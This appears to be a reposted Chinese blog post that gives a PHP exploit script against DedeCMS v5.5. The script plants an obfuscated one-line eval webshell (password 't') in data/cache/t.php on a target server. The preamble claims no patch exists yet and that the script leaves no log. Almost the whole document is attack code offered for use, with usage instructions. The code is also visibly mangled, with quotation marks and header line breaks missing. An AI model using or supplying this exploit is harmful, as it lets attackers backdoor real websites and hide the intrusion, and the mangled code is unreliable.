官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马密码t,
官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志
print_r(
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
);
if ($argc < 3) {
print_r(
+----------------------------------------+
Usage: php .$argv[0]. host path
host: target server (ip/hostname)
path: path to dedecms
Example:
php .$argv[0]. localhost /dedecms/
+----------------------------------------+
);
exit;
}
error_reporting(7);
ini_set(max_execution_time, 0);
$host = $argv[1];
$path = $argv[2];
$post_a = plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*;
$post_b = needCode=aa/../../../data/mysql_error_trace;
$shell = data/cache/t.php;
get_send($post_a);
post_send(plus/comments_frame.php,$post_b);
$content = post_send($shell,t=echo tojen;);
if(substr($content,9,3)==200){
echo "Shell Address is:".$host.$path.$shell;
}else{
echo "Error.";
}
function get_send($url){
global $host, $path;
$message = "GET ".$path."$url HTTP/1.1";
$message .= "Accept: */*";
$message .= "Referer: http://$host$path";
$message .= "Accept-Language: zh-cn";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";
$message .= "Host: $host";
$message .= "Connection: Close";
$fp = fsockopen($host, 80);
if(!$fp){
echo "Connect to host Error";
}
fputs($fp, $message);
$back = ;
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
function post_send($url,$cmd){
global $host, $path;
$message = "POST ".$path."$url HTTP/1.1";
$message .= "Accept: */*";
$message .= "Referer: http://$host$path";
$message .= "Accept-Language: zh-cn";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";
$message .= "Host: $host";
$message .= "Content-Length: ".strlen($cmd)."";
$message .= "Connection: Close";
$message .= $cmd;
$fp = fsockopen($host, 80);
if(!$fp){
echo "Connect to host Error";
}
fputs($fp, $message);
$back = ;
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
?>
本文来源于独自等待博客